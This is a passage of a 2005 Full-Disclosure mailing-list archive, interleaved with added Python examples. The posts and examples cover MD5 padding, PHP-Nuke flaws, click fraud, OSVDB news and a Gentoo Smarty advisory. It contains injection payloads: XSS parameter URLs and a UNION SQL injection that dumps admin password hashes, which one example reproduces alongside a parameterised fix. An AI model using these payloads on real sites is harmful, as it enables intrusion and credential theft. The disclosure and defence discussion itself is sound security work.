> at sun.reflect.GeneratedMethodAccessor21.invoke(Unknown Source)
> at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
> at java.lang.reflect.Method.invoke(Unknown Source)
> at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
> at sun.rmi.transport.Transport$1.run(Unknown Source)
> at java.security.AccessController.doPrivileged(Native Method)
> at sun.rmi.transport.Transport.serviceCall(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
> at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
> at java.lang.Thread.run(Unknown Source)
>
> #######################END#############################
>
> .:: EXTRA
>
> We did not find any way to perform any unauthorized actions or gain
> additional privileges.
>
> .:: DISCLOSURE TIMELINE
>
> 04/01/2005 Initial vendor notification
> 04/06/2005 Initial vendor response
> 04/08/2005 Public disclosure
>
> .:: CREDIT
>
> Francisco Amato is credited with discovering this vulnerability.
> famato][at][infobyte][dot][com][dot][ar
>
> .:: LEGAL NOTICES
>
> Copyright (c) 2005 by [ISR] Infobyte Security Research.
> Permission to redistribute this alert electronically is granted as long as
> it is not edited in any way unless authorized by Infobyte Security Research Response.
> Reprinting the whole or part of this alert in any medium other than
> electronically requires permission from infobyte com ar
>
> Disclaimer
> The information in the advisory is believed to be accurate at the time of
> publishing based on currently available information. Use of the information
> constitutes acceptance for use in an AS IS condition. There are no warranties
> with regard to this information. Neither the author nor the publisher accepts
> any liability for any direct, indirect, or consequential loss or damage
> arising from use of, or reliance on, this information.
>
From: Scott Edwards (supadupa
gmail.com)
Date: Fri Apr 08 2005 - 22:18:41 CDT
On Apr 8, 2005 10:50 AM, Jason <security
brvenik.com> wrote:
[snip]
> I think that entirely depends on the format the file is distributed in.
> You could take a zipfile and pad it in non critical areas to change the
> MD5 without creating a substantial difference in the deliverable
> content. You could do the same with gzip or bzip formatted files. You
> could also pad any embedded jpeg images to engineer a collision. There
> are quite a few opportunities where this method could be used to twiddle
> the new MD5 without materially changing the content.
>
> Here is the case I am thinking about.
>
[snip]
You can always use steganography
[http://en.wikipedia.org/wiki/Steganography]* for purposes of causing
the MD5 to change. There doesn't even have to be valid data to hide
in what I'll just reference as the "steganography metadata stream".
The key is to allow both copies to appear to operate the same, but are
clearly different when compared byte for byte. bitmaps, lossless or
lossy, just modify a few pixels. Find something that's not being
utilized, and modify it so the data type is still ok, but the data is
ever-so slightly different. Just think about crafty viruses like CIH
that relocated itself in unused areas in the executable.
After this, you'll have a hard time discerning between the originals
and the fakes. You'll have more ground that'll need to be researched
to see if every varying signature is liable as a claimed infringement.
Even if it's distorted, it's still plausible as a protected work - but
to what degree I can't say ** (how much milk does plain water need to
be to become milk? at what point isn't it water anymore?). Granted,
exclusive use of tainting the signature weakens P2P, as this is a
relative dependency.
Aside from all this, it's best to avoid the appearance of evil. I
won't vouch for anyone else's actions, but *do* exercise caution.
(caveat emptor, no two ways about it).
* Edit+Improve this article if you can.
** That's right, it's a security/disclosure mailing list - not an open
legislative discussion one.
I hope you've enjoyed my comments - and if not, no loss for me.
Thanks,
Scott Edwards
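The following is an added example, not code from anyone in this thread. It demonstrates the "pad it in non critical areas" idea from Jason's post and the "steganography metadata stream" from Scott's: bytes placed where the unpacker ignores them (here the ZIP archive comment) change the MD5 and the size while every extracted file stays byte-for-byte identical. The file names and contents are constructed test data.

```python
# Added example: not code from anyone in this thread.  Bytes placed where the
# unpacker ignores them (the ZIP archive comment) change the MD5 while every
# extracted member stays identical.  File names and contents are constructed.
import hashlib
import io
import zipfile

# Constructed stand-in for a redistributed software archive.
SAMPLE_FILES = {
    "README.txt": b"constructed sample content for the MD5 padding demo\n",
    "bin/tool": b"\x7fELF" + b"\x00" * 60,  # ELF-looking blob, not a real binary
}


def build_zip(files, comment=b""):
    """Pack `files` into an in-memory ZIP with an optional archive comment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in sorted(files.items()):
            # Fixed timestamp so the two archives differ only where intended.
            info = zipfile.ZipInfo(name, date_time=(2005, 4, 8, 0, 0, 0))
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, data)
        zf.comment = comment  # stored in the end-of-central-directory record
    return buf.getvalue()


def extract_all(blob):
    """Return {name: bytes} for every member, i.e. what an unpacker delivers."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def md5_hex(blob):
    return hashlib.md5(blob).hexdigest()


def demo(padding=b"\x00" * 1024):
    """Compare an archive with and without `padding` in its comment field."""
    original = build_zip(SAMPLE_FILES)
    padded = build_zip(SAMPLE_FILES, comment=padding)
    return {
        "md5_original": md5_hex(original),
        "md5_padded": md5_hex(padded),
        "size_original": len(original),
        "size_padded": len(padded),
        "same_payload": extract_all(original) == extract_all(padded),
        "same_hash": md5_hex(original) == md5_hex(padded),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

What this shows is only that the hash of the redistributed copy is trivially different from the hash on a blocklist; the padded file does not collide with anything. Making a modified file hash to a specific pre-existing value is a second-preimage problem, and no amount of padding in a comment field, an image, or an unused executable section gets you there.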
From: Paul Laudanski (zx
castlecops.com)
Date: Sat Apr 09 2005 - 00:12:12 CDT
A cursory web search revealed...
On 4 Apr 2005, Maksymilian Arciemowicz wrote:
> - --- 1.Description --- PHP-Nuke is a Web Portal System, storytelling
[SNIP]
>
> - --- 2. XSS ---
> 2.0
> http://[HOST]/[DIR]/banners.php?op=EmailStats&name=sex&bid=[XSS]
>
> 2.1
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=TopRated&ratenum=[XSS]&ratetype=num
This has been a bug for over a year now:
http://www.waraxe.us/content-5.html
>
> 2.2
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=MostPopular&ratenum=%3Ch1%3E50&ratetype=num
This too was pointed out nearly two years ago:
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1213.html
>
> 2.3
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkdetails&ttitle=[XSS]
>
> 2.4
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkeditorial&ttitle=[XSS]
>
> 2.5
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=viewlinkcomments&ttitle=[XSS]
>
> 2.6
> http://[HOST]/[DIR]/modules.php?name=Web_Links&l_op=ratelink&ttitle=[XSS]
>
> 2.7
> http://[HOST]/[DIR]/modules.php?name=Your_Account&op=userinfo&bypass=1&username=[XSS]
In general a multi-layered defense system is a good idea. mod_security is
a great tool for Apache which can be installed to catch certain kinds of
GET injections. Certainly not fool proof as the codebase should filter
inputs.
>
> - --- 3. Path Disclosure ---
>
On the topic of programming it is good practice to validate input,
however, for path disclosure, it is an even better plan to disable
displaying errors on a production website.
> - --- 4. How to fix ---
> Because phpnuke doesn't have a security contact, you can download my patch from securityreason.com
> http://securityreason.com/patch/PhpNuke-7.6-adv.by.cXIb8O3.12-patch.tar.gz
>
Actually I know of a couple sites that work effortlessly to promote
security in php-nuke. These days chatserv works on writing and collecting
patches into a bundle for download:
nukecops.com
nukeresources.com
ravenphpscripts.com
I'd suggest posting your finds as news submissions to these sites, with
always a followup to phpnuke.org's Francisco (AKA nukelite).
--
Sincerely,
Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CC Blog ......... http://blog.castlecops.com
Staff Blogs ..... http://busterbunny.castlecops.com
Our Vision ...... http://castlecops.com/postt63382.html
http://cuddlesnkisses.com http://justalittlepoke.com http://zhen-xjell.com
From: Paul Laudanski (zx
castlecops.com)
Date: Sat Apr 09 2005 - 00:20:35 CDT
On 7 Apr 2005, Janek Vind wrote:
> http://localhost/nuke76/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION
> %20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors/*
>
> ... and as result we can see md5 hashes of all the admin passwords in place, where normally
> top 10 votes can be seen :)
Again as before, code should be validating input. But as a simple
precaution against default GET attacks, changing the table prefix from the
common "nuke_" to something random like "zloqf7_" would render that
sample, and all others based on "nuke_" useless.
Of course in the grander scheme that isn't foolproof, but does work
against the default GETs.
--
Sincerely,
Paul Laudanski .. Computer Cops, LLC.
Microsoft MVP Windows-Security 2005
CastleCops(SM)... http://castlecops.com
CC Blog ......... http://blog.castlecops.com
Staff Blogs ..... http://busterbunny.castlecops.com
Our Vision ...... http://castlecops.com/postt63382.html
http://cuddlesnkisses.com http://justalittlepoke.com http://zhen-xjell.com
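The following is an added example; it is not code from PHP-Nuke or from anyone in this thread. It reproduces the UNION injection Janek Vind quotes above against an in-memory SQLite database and shows what Paul's two suggestions do to it: the random table prefix breaks this particular canned payload, while input validation plus a bound parameter removes the flaw. The schema (a four-column stories table and an authors table with a `pwd` column), the column names, and the way `querylang` is used are assumptions modelled on the payload, not PHP-Nuke's real source.

```python
# Added example: not code from PHP-Nuke or from anyone in this thread.
# Schema, column names and the querylang handling are assumptions modelled
# on the quoted payload; only nuke_authors.pwd and querylang come from it.
import hashlib
import sqlite3

# Constructed admin password hash stored in the authors table.
ADMIN_HASH = hashlib.md5(b"constructed-secret").hexdigest()

# The payload from the quoted post, URL-decoded.
PAYLOAD = " WHERE 1=2 UNION ALL SELECT 1,pwd,1,1 FROM nuke_authors/*"


def make_db(prefix="nuke_"):
    """Build a constructed PHP-Nuke-like schema under the given table prefix."""
    con = sqlite3.connect(":memory:")
    con.execute(f"CREATE TABLE {prefix}stories "
                "(sid INTEGER, title TEXT, alanguage TEXT, counter INTEGER)")
    con.executemany(f"INSERT INTO {prefix}stories VALUES (?, ?, ?, ?)",
                    [(1, "first story", "english", 50),
                     (2, "zweite story", "german", 30)])
    con.execute(f"CREATE TABLE {prefix}authors (aid TEXT, pwd TEXT)")
    con.execute(f"INSERT INTO {prefix}authors VALUES (?, ?)", ("God", ADMIN_HASH))
    con.commit()
    return con


def top_stories_vulnerable(con, querylang, prefix="nuke_"):
    """The flaw: the querylang fragment is pasted straight into the SQL text."""
    sql = (f"SELECT sid, title, alanguage, counter FROM {prefix}stories"
           f"{querylang} ORDER BY counter DESC LIMIT 10")
    return con.execute(sql).fetchall()


def top_stories_fixed(con, language=None, prefix="nuke_"):
    """The fix: check the shape of the input, then bind it as a parameter."""
    sql = f"SELECT sid, title, alanguage, counter FROM {prefix}stories"
    params = ()
    if language is not None:
        if not language.isalpha():       # a language code is letters only
            raise ValueError("invalid language code")
        sql += " WHERE alanguage = ?"    # bound, never concatenated
        params = (language,)
    sql += " ORDER BY counter DESC LIMIT 10"
    return con.execute(sql, params).fetchall()


def run_demo():
    results = {}
    # 1. Default prefix: the Top 10 list becomes a dump of admin hashes.
    con = make_db("nuke_")
    results["leaked_rows"] = top_stories_vulnerable(con, PAYLOAD)
    # 2. Random prefix: same flaw, but the canned payload names nuke_authors,
    #    which no longer exists, so this particular sample fails.
    con2 = make_db("zloqf7_")
    try:
        top_stories_vulnerable(con2, PAYLOAD, prefix="zloqf7_")
        results["prefix_blocked"] = False
    except sqlite3.OperationalError:
        results["prefix_blocked"] = True
    # 3. Validated and parameterised: the payload is rejected outright and a
    #    legitimate value still works.
    try:
        top_stories_fixed(con, PAYLOAD)
        results["fixed_rejected"] = False
    except ValueError:
        results["fixed_rejected"] = True
    results["fixed_rows"] = top_stories_fixed(con, "english")
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The prefix trick only defeats payloads that hard-code `nuke_`; an attacker who learns the prefix from a verbose error or a second query is back in business, which is why the validated, parameterised version is the one that actually closes the hole.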
From: Thierry Zoller (Thierry
sniff-em.com)
Date: Sat Apr 09 2005 - 05:33:26 CDT
Guten Tag Jason,
[1]
J> It was once said that you could not realistically create two difference
J> sets of data that would cause a hash collision.
Correct, note that there has been as much (if not more) research in that field than in
the heap overflow sector.
[2]
J> It was once said that you could not exploit heap overflows and that
J> stack overflows did not allow for control of the machine.
Correct.
[3]
J> It was once thought that you could not use a format string to create an
J> exploitable condition.
Correct.
While these three statements are logically correct in themselves, there is no
necessary implication between those 3 sentences, which means they don't
prove your point. In other words, it is true that statements [2] and [3] were made
and were proven to be wrong, however that doesn't imply statement [1]
is wrong.
J> I see enough opportunities for motivated people to do the research and
J> create a solution that is not computationally prohibitive. I would not
J> be surprised if this happens in relatively short time.
"relatively short time"
That's impossible because "relatively short time" has already
expired... hash functions (MD5) are not new.. in other words .. timed out ;)
--
Thierry Zoller
From: Randall M (randallm
fidmail.com)
Date: Sat Apr 09 2005 - 08:10:30 CDT
I for one say this is a step in the right direction. Shows they want to work
with us.
Randall M
"If we ever forget that we're one nation under God, then we will be a nation
gone under."
- Ronald Reagan
_________________________________
:-----Original Message-----
:From: full-disclosure-bounces
lists.grok.org.uk
:[mailto:full-disclosure-bounces
lists.grok.org.uk] On Behalf
:Of Microsoft Security Response Center
:Sent: Friday, April 08, 2005 2:21 PM
:To: bugtraq
securityfocus.com;
:ntbugtraq
listserv.ntbugtraq.com; full-disclosure
lists.grok.org.uk
:Subject: [Full-disclosure] How to Report a Security
:Vulnerability toMicrosoft
:
:-----BEGIN PGP SIGNED MESSAGE-----
:Hash: SHA1
:
:Hello!
:
:The Microsoft Security Response Center investigates all
:reports of security vulnerabilities sent to us that affect
:Microsoft products.
:If you believe you have found a security vulnerability
:affecting a Microsoft product, we would like to work with you
:to investigate it.
:
:We are concerned that people might not know the best way to
:report security vulnerabilities to Microsoft. You can contact
:the Microsoft Security Response Center to report a
:vulnerability by emailing secure
microsoft.com directly, or
:you can submit your report via our web-based vulnerability
:reporting form located at:
:https://www.microsoft.com/technet/security/bulletin/alertus.aspx.
:
:Sincerely,
:Microsoft Security Response Center
:
:-----BEGIN PGP SIGNATURE-----
:Version: PGP 8.1
:
:iQIVAwUBQlbY4oreEgaqVbxmAQK5yhAAkm+H1/V69L5iLILNuSUSsgnd4Tw5Lzwj
:uyhigxfdJR9WYXSNg/7WCoMI77G6No8QvKOfkrXqbyv6SYcR5ZVDWYzeE3+jgje+
:AfqWT9r0du8Wj7q+Qby/j61OaezQkGoX/WRM+KV/RAhSVgXybcUMmdyeBNY9TiBg
:ixlCuE75VndS0vMwkf8rzGaW/YXzMveLEXKGyYhkkZEDZ+Q2NZeFwxsXUEfw8yCL
:nUYm6D9KAz5ekhRNtv22eoTXfTrXOfdziEAGGB1J6hKowEgeTaKcRPuTadz4A8YB
:gGzJPN3J6t1Au1IHRsgfnVou9INFtahHA5B1NbfKyHGLsoztYKqXxLo4u7Z/b2+a
:Vj8yiZNmaFD1IPzPnb4LS4RBZSgPMcwaB6pbXt7Y9n/g8VmrkqouDEdprHlMltoS
:JpqYpnTdZtsxaGg6wimaFv7CocdV4CKAuOpVdjvlezc6jUYLQ/H/LzgDFDekTXZv
:TNJ7qzRl4GFKt2fK7+7m60x3VukWNy3JGQSxgOX7mkftfglrHzyOL6AtDwhf2ff4
:uNVbWek9bTgpVvmmpxnFGu/h5hLp5/Hqe98lv2axlbEFLP1ZD00rNPPSLCxRY/xL
:8DGokeQT2Oc1HysO2jo7kpFjW4mCTTh9qK1lh0ju7gGQa66SMJ9woT2V6sSsOwpS
:LO3tKPf9GIQ=
:=kT17
:-----END PGP SIGNATURE-----
From: Honza Vlach (janus
volny.cz)
Date: Sat Apr 09 2005 - 09:02:15 CDT
The point is, that they don't check the hashes.
They once sent a mail concerning a file spider.tgz of size around 130kb
claiming it is the Spiderman 2 movie.
And the path was like
/pub/linux/Slackware/10.0/ ... you get the idea.
So it's just a fuss worth nothing.
Just my $0.02
Honza Vlach
--
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GIT/CS d- s: a-- C++++$ ULS++++$ P L+++ E--- W- N+ o? K? w-->--- O?
M->+ V? PS PE Y++ PGP+++ !t 5? X++ R tv-- b++ DI+ D++ G+>+++ e h--- r++ y?
------END GEEK CODE BLOCK------
() ascii ribbon campaign - against html mail
/\ - against microsoft attachments
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.7 (GNU/Linux)
iD8DBQFCV+BnSVzvioqX7FkRAidCAJ98RTeSzP1eWoMsn0PZVJ9+QT4LMACfU5oh
B3czdc+Qvm3VHjWNQQc0FYA=
=AyQS
-----END PGP SIGNATURE-----
From: Mike Barushok (mikehome
kcisp.net)
Date: Sat Apr 09 2005 - 16:31:01 CDT
On Fri, 8 Apr 2005, Astharot wrote:
> The graphical statistics for the year 2004 are finally ready! They also
> contain excerpts of the years 2002 and 2003 when needed.
>
> There are two files
>
> a nice PDF document which can be downloaded here
>
> http://www.zone-h.org/download/file=5392/
Problem with graph in the document:
In the PDF document, on page 5, the same graph appears twice
with two different captions. The one labelled 'Single defacements
by months', which is the lower one on the page, appears to be
inconsistent with graphs elsewhere in the document.
Problems with text in the document:
Pages 1 and 2 have many errors of spelling and of grammar,
throughout each paragraph and the index. The entire text
needs to be re-written or corrected by someone with better
English skills if a professional appearance is desired.
Problem with using the information complying with disclaimer:
Note on page 2 states no commercial purpose, and goes on to
allow students, journalists, and researchers to use except for
when 'direct or indirect profit is obtained'. Yet all students,
journalists and researchers expect direct or indirect profit.
Unless profit is explicitly defined to mean only monetary
remuneration directly for the product that cites the article,
because profit generally would include reputation, exchange
of work for progress towards completion of a degree, ability
to perform any transformation of data into information or to
benefit in any number of intangible ways from the information.
The disclaimer overrides the Creative Commons Deed on Page 13:
The ordinary method a student, journalist, or researcher would
use the document is to cite only parts that are useful, or to
transform the information into a form that fits their intended
use. Those uses would be permitted were it not for the verbiage
on Page 2. There are no rights allowed under the limits on Page 2
that extend what would be allowed by Creative Commons
license - 'Attribution-NonCommercial-NoDerivs',
on page 13.
View the full license at:
http://creativecommons.org/licenses/by-nc-nd/2.0/legalcode
As such, the license on Page 2 is more restrictive than what
you probably intended, and there appears to be no reason to
have the Note on page 2, unless you did not intend to release
with the Creative Commons license on Page 13.
>
> while the full set of data in txt format, ready to be imported in your
> spreadsheet can be downloaded here:
>
> http://www.zone-h.org/download/file=5393/
>
<snipped>
> Enjoy!
>
> SyS64738 - Roberto Preatoni
> astharot - Gerardo Di Giacomo
> www.zone-h.org
>
> Original article:
> - http://zone-h.org/en/news/read/id=4457/
From: Sumy (sanandres at gmail.com)
Date: Sat Apr 09 2005 - 17:53:41 CDT
What Is Click Fraud?
Click fraud, or click spamming, occurs when a person or program
accesses a URL with no intention of browsing the site, purchasing a
product or performing any other type of conversion action. That
definition may be hard to understand, so we have put together some
examples of the types of click fraud that are occurring every day (and
may be occurring to you!) and how these fraudulent activities occur.
How Is Click Fraud Committed?
Paid to Click Jobs
"A growing number of housewives, college graduates, and even working
professionals across metropolitan cities are rushing to click paid
Internet ads to make $100 to $200 (up to Rs 9,000) per month," the
Times of India claims. This article was published in May of 2004 and
serves as a wakeup call to all online advertisers. These companies are
popping up all over and have many different ways to defraud PPC
advertisers. They pay people to search for certain keywords, click on
certain ads and even tell them to stay on each site a certain amount
of time so it doesn't look suspicious. They even email ads to
employees to have them click. Why does this happen? For the reasons
above, competitors and affiliates hire these companies because they
are able to increase the cost to their competitors or increase their
own revenue through their advertising affiliate programs, whichever
they choose.
Full FAQ
http://www.exploitx.com/forum/azbb.php?1113062913
Internet Fraud Articles:
http://www.exploitx.com/forum/azbb.php?Internet_Fraud
--
http://www.outwartips.net
http://www.exploitx.com
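The paid-to-click pattern the post describes (workers sent to one keyword, told to stay on the page for a fixed time, never converting) leaves a recognisable trace in an advertiser's click log. The following is an added example, not code from the post or from exploitx.com: it parses a constructed click log and flags sources whose dwell times are near-identical, that never convert, and that hit a single paid keyword. The log format, the field names, the thresholds and the sample lines are all assumptions made for this illustration.

```python
"""Added example: flag paid-to-click behaviour in an ad-click log.
Log format, thresholds and sample lines are constructed assumptions."""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample log: timestamp, source IP, keyword, dwell seconds, converted flag.
# 203.0.113.5 behaves like a paid clicker; the other two look like real visitors.
SAMPLE_LOG = """\
2005-04-09T10:00:01 203.0.113.5 keyword=loans dwell=31 conv=0
2005-04-09T10:00:44 203.0.113.5 keyword=loans dwell=30 conv=0
2005-04-09T10:01:20 203.0.113.5 keyword=loans dwell=30 conv=0
2005-04-09T10:02:05 203.0.113.5 keyword=loans dwell=31 conv=0
2005-04-09T10:02:50 203.0.113.5 keyword=loans dwell=30 conv=0
2005-04-09T10:03:33 203.0.113.5 keyword=loans dwell=30 conv=0
2005-04-09T10:05:12 198.51.100.7 keyword=loans dwell=12 conv=0
2005-04-09T11:47:03 198.51.100.7 keyword=loans dwell=240 conv=1
2005-04-09T12:10:44 192.0.2.9 keyword=loans dwell=5 conv=0
"""


def parse_log(text):
    """Group click events by source IP; each event is a small dict."""
    clicks = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        clicks[ip].append({
            "ts": ts,
            "keyword": kv["keyword"],
            "dwell": int(kv["dwell"]),
            "conv": kv["conv"] == "1",
        })
    return clicks


def score_source(events, min_clicks=5, max_dwell_spread=2.0):
    """Return the reasons one IP looks like a paid-to-click worker (empty if none).

    Thresholds are assumptions: a real deployment tunes them per campaign."""
    reasons = []
    if len(events) < min_clicks:
        return reasons
    dwells = [e["dwell"] for e in events]
    # Workers told to "stay N seconds" produce near-identical dwell times;
    # genuine visitors scatter widely.
    if pstdev(dwells) <= max_dwell_spread:
        reasons.append(f"uniform dwell ~{mean(dwells):.0f}s over {len(events)} clicks")
    # Many clicks without a single conversion.
    if not any(e["conv"] for e in events):
        reasons.append("many clicks, zero conversions")
    # Every click lands on the same paid keyword.
    if len({e["keyword"] for e in events}) == 1:
        reasons.append("all clicks on one paid keyword")
    return reasons


def suspicious_sources(text):
    """Map each suspicious IP to the list of reasons it was flagged."""
    flagged = {}
    for ip, events in parse_log(text).items():
        reasons = score_source(events)
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in suspicious_sources(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

On the constructed log only 203.0.113.5 is flagged, on all three counts; the two other sources have too few clicks to judge. The dwell-time check is the one aimed squarely at the "stay a certain amount of time" instruction quoted above: a human told to wait thirty seconds waits thirty seconds every time.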
From: jkouns (jkouns at opensecurityfoundation.org)
Date: Sun Apr 10 2005 - 01:37:35 CDT
OSVDB Recognized as 501(c)3 Non-Profit Organization
The Open Source Vulnerability Database, a project to catalog and
describe the world's security vulnerabilities, has continued to focus on
improving database content and increasing services offered to the
security community.
Since the official launch of OSVDB in March 2004, the vulnerability
database has grown from 1000 to over 6700 complete entries. This rapid
growth has far surpassed initial estimates, and the project’s many
successes show that the open source community can truly deliver
world-class security information.
OSVDB’s rapid success is directly attributed to the dedicated volunteers
who help populate, maintain and enhance the database. Their hard work
has already allowed OSVDB to exceed the amount of vulnerability
information available in some databases. At the current rate of growth,
the project is poised to surpass the other vulnerability databases by
the end of 2005. “It will soon become mandatory for security
professionals to use OSVDB if they want the most thorough information
available,” says Brian Martin, one of the project leaders.
The OSVDB leadership team has been aggressively working to ensure the
long term viability of the project. After improving content to be
recognized as an industry leader, the team determined that incorporating
as a non-profit organization was imperative to OSVDB’s future success.
Founded to formally run the OSVDB project, the Open Security Foundation
has been approved as a 501(c)3 non-profit organization under United
States law. Jake Kouns, OSVDB project lead, says, “Achieving our
non-profit status will allow us to seek funding and ensure free
vulnerability information will be available for years to come.”
Two of the OSVDB project leaders, Brian Martin and Jake Kouns, will be
presenting a talk called “Vulnerability Databases: Everything is
Vulnerable” at cansecwest/core05 (http://www.cansecwest.com/) in May
2005. The presentation aims to provide an unbiased review of
vulnerability databases, and addresses the value they should provide to
security practitioners.
###
More Information:
Jake Kouns
Open Source Vulnerability Database Project
+1.804.306.8412
jkouns at osvdb.org
From: Gerardo 'Astharot' Di Giacomo (astharot at zone-h.org)
Date: Sun Apr 10 2005 - 07:41:50 CDT
Thanks for pointing out the mistakes, we corrected them. The duplicated
graph mystery solution was fairly simple: we used the data for the
mass defacements counted by month twice.
Now the single defacements counted by month graph is in its place.
The discrepancy in the licence has also been fixed. This happens
when multiple hands are working on a single thing. Thanks for pointing
that out as well.
We also added a note (suggested by Jericho) to explain how mass
defacements and single defacements are counted.
About the English, we are working on it :) We are confident that in
just a couple of centuries we will be able to come out with
Gartner-like reports.
Zone-H staff
From: John Cartwright (johnc at grok.org.uk)
Date: Sun Apr 10 2005 - 09:19:01 CDT
[Full-Disclosure] Mailing List Charter
John Cartwright <johnc at grok.org.uk>
- Introduction & Purpose -
This document serves as a charter for the [Full-Disclosure] mailing
list hosted at lists.grok.org.uk.
The list was created on 9th July 2002 by Len Rose, and is primarily
concerned with security issues and their discussion. The list is
administered by John Cartwright.
The Full-Disclosure list is hosted and sponsored by Secunia.
- Subscription Information -
Subscription/unsubscription may be performed via the HTTP interface
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.
Alternatively, commands may be emailed to
full-disclosure-request at lists.grok.org.uk; send the word 'help' in
either the message subject or body for details.
- Moderation & Management -
The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to
accept submissions from non-members based on individual merit and
relevance.
It is expected that the list will be largely self-policing; however, in
special circumstances (e.g. spamming, misappropriation) offending
members may be removed from the list by the management.
An archive of postings is available at
http://lists.grok.org.uk/pipermail/full-disclosure/.
- Acceptable Content -
Any information pertaining to vulnerabilities is acceptable, for
instance announcement and discussion thereof, exploit techniques and
code, related tools and papers, and other useful information.
Gratuitous advertisement, product placement, or self-promotion is
forbidden. Disagreements, flames, arguments, and off-topic discussion
should be taken off-list wherever possible.
Humour is acceptable in moderation, providing it is inoffensive.
Politics should be avoided at all costs.
Members are reminded that due to the open nature of the list, they
should use discretion in executing any tools or code distributed via
this list.
- Posting Guidelines -
The primary language of this list is English. Members are expected to
maintain a reasonable standard of netiquette when posting to the list.
Quoting should not exceed that which is necessary to convey context;
this is especially relevant to members subscribed to the digested
version of the list.
The use of HTML is discouraged, but not forbidden. Signatures will
preferably be short and to the point, and those containing
'disclaimers' should be avoided where possible.
Attachments may be included if relevant or necessary (e.g. PGP or
S/MIME signatures, proof-of-concept code, etc) but must not be active
(in the case of a worm, for example) or malicious to the recipient.
Vacation messages should be carefully configured to avoid replying to
list postings. Offenders will be excluded from the mailing list until
the problem is corrected.
Members may post to the list by emailing
full-disclosure at lists.grok.org.uk. Do not send subscription/
unsubscription mails to this address; use the -request address
mentioned above.
- Charter Additions/Changes -
The list charter will be published at
http://lists.grok.org.uk/full-disclosure-charter.html.
In addition, the charter will be posted monthly to the list by the
management.
Alterations will be made after consultation with list members and a
consensus has been reached.
From: Thierry Carrez (koon at gentoo.org)
Date: Sun Apr 10 2005 - 11:33:10 CDT
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory [UPDATE] GLSA 200503-35:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Smarty: Template vulnerability
Date: March 30, 2005
Updated: April 09, 2005
Bugs: #86488
ID: 200503-35:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Update
======
New ways of bypassing Smarty's "Template security" were found and
fixed in Smarty. Users making use of that feature are encouraged
to upgrade to version 2.6.9.
The updated sections appear below.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-php/smarty < 2.6.9 >= 2.6.9
Description
===========
A vulnerability has been discovered within the regex_replace modifier
of the Smarty templates when allowing access to untrusted users.
Furthermore, it was possible to call functions from {if} statements and
{math} functions.
Resolution
==========
All Smarty users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-php/smarty-2.6.9"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200503-35.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or, alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
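The advisory names the two weak spots only at the level of "the regex_replace modifier" and "functions called from {if} statements and {math} functions". As an added illustration, not Smarty's code and not taken from the GLSA, the checks below show the two controls a template sandbox needs in exactly those places: a filter on the pattern string handed to a regex-replace modifier that refuses PHP's `e` (eval) modifier, under which preg_replace() executes the replacement string as PHP code, and an allow-list of function names that a template expression may call. That the `e` modifier is the specific hazard behind the regex_replace entry is an assumption on my part, as is the allow-list content; the sample patterns and expressions are constructed.

```python
"""Added example: two sandbox checks for a Smarty-style template engine.
Not Smarty's implementation. The allowed-function list and the PCRE
delimiter handling (symmetric delimiters only) are assumptions."""
import re

# Functions a sandboxed {if} / {math} expression may call. Assumed list.
ALLOWED_IF_FUNCS = {"count", "sizeof", "empty", "is_array", "in_array"}

# Expression keywords that also appear before "(" but are not calls.
_KEYWORDS = {"and", "or", "not", "xor"}

# A PCRE pattern as passed to preg_replace(): delimiter, body, same delimiter, flags.
_PCRE = re.compile(r"^(?P<d>[^\w\s\\])(?P<body>.*)(?P=d)(?P<flags>[A-Za-z]*)$", re.S)

# An identifier followed by "(", but not a "$variable(" reference.
_CALL = re.compile(r"(?<![\w$])([A-Za-z_]\w*)\s*\(")


def sanitize_regex_pattern(pattern):
    """Return the pattern with any 'e' (eval) modifier stripped, or None if malformed.
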